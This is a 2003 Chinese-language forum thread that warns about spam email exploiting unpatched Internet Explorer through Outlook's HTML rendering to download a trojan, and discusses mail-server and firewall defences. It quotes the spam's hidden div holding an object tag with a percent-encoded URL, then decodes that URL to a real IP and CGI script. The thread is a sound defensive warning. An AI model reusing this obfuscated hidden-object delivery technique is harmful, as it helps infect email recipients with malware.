作者 主題: 小心一種 SPAM 病毒哦  (閱讀 9388 次)

0 會員 與 1 訪客 正在閱讀本文。

abelyang

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 1097
    • 檢視個人資料
小心一種 SPAM 病毒哦
« 於: 2003-09-06 16:27 »
從一些 news 看到的一種 spam virus
利用 outlook 等的 html 展開功能讓你的 IE 中毒而下載 木馬
IE 沒有 patch 的小心點囉~~
管 mail server 要盡責了...
MIS 可能又有得忙囉 (也可能不會有太大的規模啦)

以上是 SPAM Virus 的部份內容,參考看看了,他利用
IE (html) 中的 object 語法讓你的 outlook 去讀他的網站
> I recently received the following HTML spam e-mail:
>
> ----<html>
> <head>
> <div style="display.none">&lt;object data="http://%363.2%346.%3130.2%30%31%2F%
> 63g%69%2D%62i%6E%2Fa%2E%63%67%69">&lt;/object&gt;</div>
> </head>
> <body>
> <p>Hey,</p>
> <p>Want to go to the pub on Saturday?</p>
> <p>Last Saturday was a blast!</p>
> <p>Let me know!</p>
> </body>
> ------</html>

掌握先機..不要等中毒了才叫苦連天

PS: 不過我看國內那些 SPAMer 大概沒有這種能力吧

wilson

  • 俺是博士!
  • *****
  • 文章數: 1821
  • 帥氣柴老大
    • 檢視個人資料
Re: 小心一種 SPAM 病毒哦
« 回覆 #1 於: 2003-09-06 19:47 »
引述: "abelyang"
從一些 news 看到的一種 spam virus
利用 outlook 等的 html 展開功能讓你的 IE 中毒而下載 木馬
IE 沒有 patch 的小心點囉~~
管 mail server 要盡責了...
MIS 可能又有得忙囉 (也可能不會有太大的規模啦)


請問學長~~像這種情況的話~~在mail server端大概是要用那種方式擋這類惡意信件呢??
謝謝!!

abelyang

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 1097
    • 檢視個人資料
小心一種 SPAM 病毒哦
« 回覆 #2 於: 2003-09-06 20:42 »
wilson 兄~
這個問題其實 IE 有 patch 就沒有什麼好擔心的
但若沒有把握每個人都有 patch , 首先要先考慮到從 mail server 去檔 (1)
如果 mail server 擋不住,大概只能再從 FW/Router 去擋了 (2)
因為 html 格式的變化太多了

除了 patch IE 外,
1. 我則會用 procmail 檔 它裏面出現的 patten (不過實在有太多變化)...
2. wilson 對網頁技巧蠻熟的,看得出來那一段 encode 嗎 ?  (ans:http://63.246.130.201/cgi-bin/a.cgi ),先把那個 IP deny 掉,

我所看到的資料顯示,他會下載一個 toolbar 到 IE, 然後中獎的人再發信給一大堆人...
有興趣的人可以參考   http://groups.google.com/groups?selm=3f55e4da_1%40nntp2.nac.net , 小心駛得萬年船總是對的~下一個中獎絕不會是我

wilson

  • 俺是博士!
  • *****
  • 文章數: 1821
  • 帥氣柴老大
    • 檢視個人資料
小心一種 SPAM 病毒哦
« 回覆 #3 於: 2003-09-06 21:00 »
嗯嗯~~感謝abelyang學長的回應~~ :P

James Wu

  • 鑽研的研究生
  • *****
  • 文章數: 683
    • 檢視個人資料
小心一種 SPAM 病毒哦
« 回覆 #4 於: 2003-09-07 04:47 »
補充一下
可以搭配MailScanner去擋掉
這裡有詳細設定
http://www.tslg.idv.tw/modules/freecontent/index.php?id=8

wilson

  • 俺是博士!
  • *****
  • 文章數: 1821
  • 帥氣柴老大
    • 檢視個人資料
小心一種 SPAM 病毒哦
« 回覆 #5 於: 2003-09-07 22:39 »
引述: "James Wu"
補充一下
可以搭配MailScanner去擋掉
這裡有詳細設定
http://www.tslg.idv.tw/modules/freecontent/index.php?id=8


感謝分享 :P